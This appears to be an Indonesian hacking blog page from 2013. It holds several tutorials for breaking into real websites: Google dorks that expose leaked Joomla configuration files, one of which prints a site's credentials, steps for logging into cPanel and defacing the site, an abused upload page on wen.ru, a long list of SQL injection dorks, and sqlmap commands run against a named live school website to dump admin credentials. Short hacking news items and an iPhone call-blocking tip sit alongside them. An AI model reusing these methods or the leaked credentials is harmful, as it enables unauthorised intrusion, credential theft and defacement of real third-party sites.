Tuesday, 12 March 2013

Cara Mencari Cpanel Menggunakan Dork

            Cpanel merupakan control panel web yang berguna untuk menyimpan/menambah/mengedit semua direktori dari suatu web. Nah, kita bisa mencari sebuah cpanel dari suatu web menggunakan bantuan dari google, yaitu menggunakan dork.



1. Ketik dork berikut ke kotak pencari google : <?php JConfig public $$offset user = filetype:txt

2. Dari hasil penesuluran, buka salah satu. Nanti anda akan melihat penampakan seperti ini

3. Coba perhatikan text ini

public $user = 'xtellkz_ujoom';
public $password = 'gfhjkm333';
Itu adalah username dan password cpanel dari suatu web. Kita tinggal cari saja itu cpanel dari web mana




4. Coba perhatikan text yang ini
public $mailfrom = 'info@shtrih.kz';
Berarti, cpanel yang kita temukan adalah cpanel dari web shtrih.kz. Kita tinggal cari tempat login untuk masuk ke cpanelnya. Biasanya www.site.com:2082

5. Masuklah menggunakan username dan password yang tadi kalian temukan

6. Jika berhasil masuk, silahkan deh di eksekusi webnya. Kalau mau di deface, tinggal masuk ke file manager, lalu ke public_html, edit isi dari file bernama index.php / index.html, isi dengan script deface kalian. Buka deh webnya www.site.com

NB : Cara ini tentunya sudah digunakan oleh banyak orang. Jadi kebanyakan web sudah pernah di deface dan pastinya sudah di patch oleh admin webnya. Jadi tidak semua username dan password yang kalian temukan itu valid. Tergantung keburuntungan anda jika menemukan yang valid.

Cara Deface Web

Cara Deface Web untuk Newbie | Wen.ru - mau share sedikit Cara Deface Web untuk Newbie, yah walaupun saya gak begitu bisa deface tapi saya akan mencoba berbagi apa yang saya ketahui :D. oke pada tutorial kali ini kita akan mencoba hack situs dengan domain wen.ru, jadi para Master Defacer bisa menyingkir dulu yah, ampun om :D

Andi X-Gen
Tutorial deface dengan upload file di wen.ru, check this on:


Peralatan:
1. Google dork: inurl:upload.html site:wen.ru
2. HTML deface (cari di google)

1. Buka www.google.com masukkan dork inurl:upload.html site:wen.ru di kotak penelusuran google
cara deface website, tutorial deface situs untuk newbie, cara deface situs wen.ru, cara deface untuk newbie, tutorial deface web wen.ru, cara mudah deface web, deface web paling mudah, hacking

2. Pilih situs yang kamu mau dari hasil pencarian tersebut, disini saya menggunakan contoh situs http://ac3v3ntura.wen.ru/upload.html, maka akan muncul seperti ini:
cara deface website, tutorial deface situs untuk newbie, cara deface situs wen.ru, cara deface untuk newbie, tutorial deface web wen.ru, cara mudah deface web, deface web paling mudah, hacking
 3. Copy Secret Code yang ada disana lalu klik upload,
4. Setelah muncul halaman baru, pastekan secret code tadi di halaman yang ada, lalu masukkan script html deface kamu dari komputer kamu, kemudian klik upload
cara deface website, tutorial deface situs untuk newbie, cara deface situs wen.ru, cara deface untuk newbie, tutorial deface web wen.ru, cara mudah deface web, deface web paling mudah, hacking
5. Setelah muncul seperti gambar dibawah, maka file deface kamu telah berhasil di upload
cara deface website, tutorial deface situs untuk newbie, cara deface situs wen.ru, cara deface untuk newbie, tutorial deface web wen.ru, cara mudah deface web, deface web paling mudah, hacking
6. Nah untuk melihat hasil deface kamu dengan http://situskamu.wen.ru/namafilekamu
kalau contoh saya diatas maka jadinya seperti ini: http://ac3v3ntura.wen.ru/h4cked.htm

keterangan: http://ac3v3ntura.wen.ru/ adalah situs target saya, sedangkan h4cked.htm adalah nama file yang saya upload tadi sehingga untuk melihat hasilnya kita gabungkan menjadi http://ac3v3ntura.wen.ru/h4cked.htm

Sunday, 3 March 2013

Google Gelar Kontes Hacker Berhadiah Jutaan Dollar


CALIFORNIA - Google baru-baru ini mengumumkan kontes untuk para hacker bertajuk Pwnium yang digelar ketiga kalinya. Kontes ini mengharuskan hacker menjebol atau crack sistem operasi (OS) Chrome dan memenangkan hadiah USD3,14159 juta.

Dilansir Theregister, Selasa (29/1/2013), kontes ini akan diselenggarakan pada 7 Maret 2013. Hacker diharuskan menembus sistem operasi Chrome pada spesifikasi dasar Samsung Chromebook 550 yang dilengkapi fitur WiFi.
Google menawarkan ratusan dollar untuk kategori pencapaian hacker tertentu, mulai dari USD110.000 dan USD150.000. Untuk dapat memenangkan hadiah uang tunai, seorang peneliti harus memberikan Google daftar lengkap dari kerentanan yang digunakan dalam serangan, serta kode yang digunakan.
"Kami percaya hadiah besar merefleksikan tantangan tambahan. Tantangan ini melibatkan penyerangan pertahanan keamanan Chrome OS, dibandingkan dengan sistem operasi tradisional," tutur Chris Evans dari tim keamanan Google Chrome.
Google telah mensponsori kontes hacking lainnya di konferensi, Pwn2Own. Kontes ini berhadiah USD100.000 serta tambahan hadiah laptop bagi hacker yang berhasil meretasnya.
Raksasa mesin pencari ini juga menawarkan hadiah USD1 juta untuk kontes Pwnium. Kabarnya, Google yang meluncurkan Chrome OS diperkuat dengan kemampuan keamanan terkuat.
Sistem operasi ini hadir dengan perpaduan modul hardware dan software yang dikemas dalam mesin, di mana teknik serangan saat ini sulit untuk menjebolnya.

Puluhan Situs Pemda di Argentina Diretas

BUENOS AIRES - Terjadi lagi, sebanyak 34 situs milik pemerintah Argentina yang dioperasikan oleh provinsi Misiones telah diretas oleh sekelompok Hacker. Kelompok yang menamakan diri mereka Bangladesh Grey Hat Hacker (GHHB) bukan hanya melakukan peretasan situs, akan tetapi, mereka pun melakukan perusakan terhadap isi dari situs.
Beberapa situs yang mengalami peretasan oleh GHHB antara lain, situs Layanan Penjara Provinsi, Departemen Pertanian dan Produksi, Departemen Kesehatan Masyarakat, Departemen Tenaga Kerja dan Ketenagakerjaan, Sekretariat Pers dan Publikasi, Pendidikan Dewan Umum, Departemen HAM, serta portal-portal pemerintah lainnya.
Dilansir dari Softpedia, Jumat, (15/2/2013), GHBB melakukan peretasan situs dengan menggunakan subdomain dari domain missioner.gov.ar. Ternyata, aksi yang dilakukan oleh para hacker ini merupakan bagian dari protes keras terhadap negara Israel.
"Perhatian pemerintah Argentina. Kami berada dalam perang dengan negara-negara yang secara langsung atau tidak langsung mendukung Israel. Jika kalian terus mendukung mereka maka anda akan menderita. Damai atau perang, "the choice is yours", "tulis para hacker pada situs-situs yang dirusak.

Kumpulan Dork Havij

Sudah belakangan ini Tenny Technology jarang update u,u . Kali ini saya akan update tentang dunia underground. Kumpulan Dork Havij Ini saya ambil dari beberapa sumber ^^


inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:Productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:transcript.php?id=
inurl:channel_id=
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:aboutbook.php?id=
inurl:review.php?id=
inurl:loadpsb.php?id=
inurl:ages.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
trainers.php?id=
article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=
sem.php3?id=
opinions.php?id=
spr.php?id=
pages.php?id=
chappies.php?id=
prod_detail.php?id=
viewphoto.php?id=
view.php?id=
website.php?id=
hosting_info.php?id=
gery.php?id=
detail.php?ID=
publications.php?id=
Productinfo.php?id=
releases.php?id=
ray.php?id=
produit.php?id=
pop.php?id=
shopping.php?id=
productdetail.php?id=
post.php?id=
section.php?id=
theme.php?id=
page.php?id=
shredder-categories.php?id=
product_ranges_view.php?ID=
shop_category.php?id=
channel_id=
newsid=
news_display.php?getid=
ages.php?id=
clanek.php4?id=
review.php?id=
iniziativa.php?in=
curriculum.php?id=
labels.php?id=
look.php?ID=
galeri_info.php?l=
tekst.php?idt=
newscat.php?id=
newsticker_info.php?idn=
rubrika.php?idr=
offer.php?idf=
"id=" & intext:"Warning: mysql_fetch_array()
"id=" & intext:"Warning: getimagesize()
"id=" & intext:"Warning: session_start()
"id=" & intext:"Warning: mysql_num_rows()
"id=" & intext:"Warning: mysql_query()
"id=" & intext:"Warning: array_merge()
"id=" & intext:"Warning: preg_match()
"id=" & intext:"Warning: ilesize()
"id=" & intext:"Warning: filesize()
index.php?id=
buy.php?category=
article.php?ID=
play_old.php?id=
newsitem.php?num=
top10.php?cat=
historialeer.php?num=
reagir.php?num=

intext:"error in your SQL syntax" +site:mm
intext:"mysql_num_rows()" +site:mm
intext:"mysql_fetch_array()" +site:mm
intext:"Error Occurred While Processing Request" +site:mm
intext:"Server Error in '/' Application" +site:mm
intext:"Microsoft OLE DB Provider for ODBC Drivers error" +site:mm
intext:"Invalid Querystring" +site:mm
intext:"OLE DB Provider for ODBC" +site:mm
intext:"VBScript Runtime" +site:mm
intext:"ADODB.Field" +site:mm
intext:"BOF or EOF" +site:mm
intext:"ADODB.Command" +site:mm
intext:"JET Database" +site:mm
intext:"mysql_fetch_row()" +site:mm
intext:"Syntax error" +site:mm
intext:"include()" +site:mm
intext:"mysql_fetch_assoc()" +site:mm
intext:"mysql_fetch_object()" +site:mm
intext:"mysql_numrows()" +site:mm
intext:"GetArray()" +site:mm
intext:"FetchRow()" +site:mm
intext:"Input string was not in a correct format" +site:mm
Semoga Postingan kali ini membantu sobat semua ^^

Tutorial Deface Dengan SQLmap Di BackTrack 5 (With Live Target)

Halo para sobat Tenny Technology, kali ini saya akan menulis tentang Cara Deface Dengan SQL Injection yang dikenal dengan teknik SQLmap di BackTrack. Tools ini sudah ada di dalam File .ISO pada BackTrack.
Disini, saya menggunakan BackTrack 5 R3.
Pertama-tama, cari target yang vuln terhadap SQL Injection, berikut ini sedikit dork dari saya : 
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:Pageid=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
Dan masih banyak lagi dork bertebaran di Google :D

Dalam Tutorial kali ini, saya akan menggunakan target salah satu Sekolah yang ada di Sidoarjo.

Untuk mengetahui Website tersebut Vuln atau tidak, silahkan tambahkan tanda ‘ (petik satu) setelah atau sebelum nomor id tersebut, bisa juga dengan menambahkan tanda  - (minus) sebelum nomor id tersebut.
Contoh :                http://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5''

Jika target tersebut Vuln terhadap SQLi, maka akan muncul kira-kira seperti ini :

Jika sudah mendapatkan target, silahkan buka Terminal, kemudian ketikan perintah “cd /pentest/database/sqlmap” (tanpa tanda petik) kemudian Enter.
Kemudian akan muncul seperti ini.

Kemudian untuk mencari nama database, ketikkan “ ./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 --dbs” (tanpa tanda petik) kemudian Enter.

Kemudian akan muncul seperti ini :

Disana kita dapat menemukan 2 Database, yaitu information_schema dan sman2sidoarjo_sman2sda
Setelah kita mendapatkan Database tersebut, kita tulis “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase --tables” (tanpa tanda petik) kemudian Enter.

Setelah itu akan muncul beberapa Tabel.


Kemudian kita mencari Colums dengan cara mengetik “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --columns” (tanpa tanda petik) kemudian Enter. 

Disini kita akan menjumpai beberapa Columns dari Tabel Admin. 
Kemudian, untuk mengetahui isi dari Columns tersebut, kita ketikkan “./sqlmap.py -uhttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5 -D namadatabase -T namatable --dump” (tanpa tanda petik) kemudian Enter.

Nah, kita sekarang sudah menemukan User + Pass Administrator dari Website tersebut:)

Jika sudah mendapatkan User + Pass, pasti Anda tau kan yang harus dilakukan ? :)
Nah, tinggal cari Login Adminnya deh :D
Caranya banyak kok di Google :)

Sekian dulu dari saya, saya ucapkan Terimakasih Banyak :)
Untuk yang ingin belajar SQL Map, silahkan menggunakan live targethttp://www.sman2sidoarjo.sch.id/beritaLengkap.php?id=5

NB : GUNAKANLAH DENGAN BIJAK :)
Backlink

Cara Memblokir Nomor Telepon di Iphone

 Jika anda memiliki Iphone dan ingin memblokir nomor telepon seseorang, Anda dapat menginstall sebuah aplikasi yang bernama "iBlacklist". Saat ini aplikasi tersebut hanya bekerja pada Jailbreak. Aplikasi ini sudah digunakan banyak orang karena memiliki kegunaan yang tangguh untuk mengabaikan panggilan yang menggangu dan yang tidak diinginkan. Ikuti tutorial dibawah ini untuk menginstall iBlacklist



  1. Pastikan Iphone tersambung kesalah satu jaringan WI-FI, EDGE, 3D 
  2. Buka aplikasi Cydia di Iphone, tekan ikon tersebut untuk membuka aplikasi jailbreak
  3. Tunggu beberapa saat sampai Cydia benar-benar terbuka
  4. Buka bagian "Utilities" pilih "iBlacklist" dan install 
  5. Setelah terinstall, klik ikon "iBlacklist" yang baru tercipta pada ponsel anda
  6. Saat aplikasi terbuka, klik menu "Blacklist". Kemudian masukkan nomor yang ingin di blokir dan tekan ok/enter. Dan anda tidak mendapat panggilan dari nomor yang telah diblokir tadi 
Semoga bermanfaat.

Newer Posts Older Posts Home